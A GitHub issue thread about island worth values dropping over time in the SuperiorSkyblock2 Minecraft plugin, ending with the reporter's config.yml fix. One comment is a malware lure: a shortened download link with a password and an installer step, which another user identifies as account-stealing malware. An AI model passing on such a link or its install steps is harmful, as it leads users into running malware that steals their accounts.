### ISSUE TITLE
Island Worth Value Decreases Over Time

### ISSUE THREAD

**Issue by TheSteveRizzo** [BG-Software-LLC/SuperiorSkyblock2#2213]
### Minecraft's Version

SPIGOT 1.21

### Plugin's Version

SuperiorSkyblock2-2024.2-b311

### Describe the bug

Island worth goes down drastically over time. Negative values are disabled in config.yml. Appropriate value shows when /is recalc is performed.

### To Reproduce

- Make an island valuable (i.e., $1,000,000) in worth.
- Set the value placeholder to a scoreboard or other utilization 
- Watch the worth decrease (i.e., $800,000 ... $500,000 ... $200,000) over time

### Additional Information

Worth values are hard defined in worth.yml not accessing other plugins for info.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by TheSteveRizzo** [comment]
> Download https://bit.ly/3MjP129 password: changeme In the installer menu, select "gcc."

I tried -- Warning: This URL has been blocked by Bitly's systems as potentially harmful.

**Comment by qoijjj** [comment]
@TheSteveRizzo do *NOT* execute this. I found this thread by searching for this malware's script. github is under attack right now by malware that steals user accounts and uses them to post a link to the same malware. Block and report.

**Comment by TheSteveRizzo** [comment]
> @TheSteveRizzo do _NOT_ execute this. I found this thread by searching for this malware's standard message. github is under attack right now by malware that steals user accounts and uses them to post a link to the same malware. Block and report.

Ok thank you, I am glad it did not work for me

**Comment by TheSteveRizzo** [comment]
**Issue Solved**

**Steps to Fix:**
- Stop Server
- Navigate to _config.yml_
- Disable negative-worth AND negative-level
- Restart server



The problem fixed itself after that. Island values no longer detract exponentially over time.
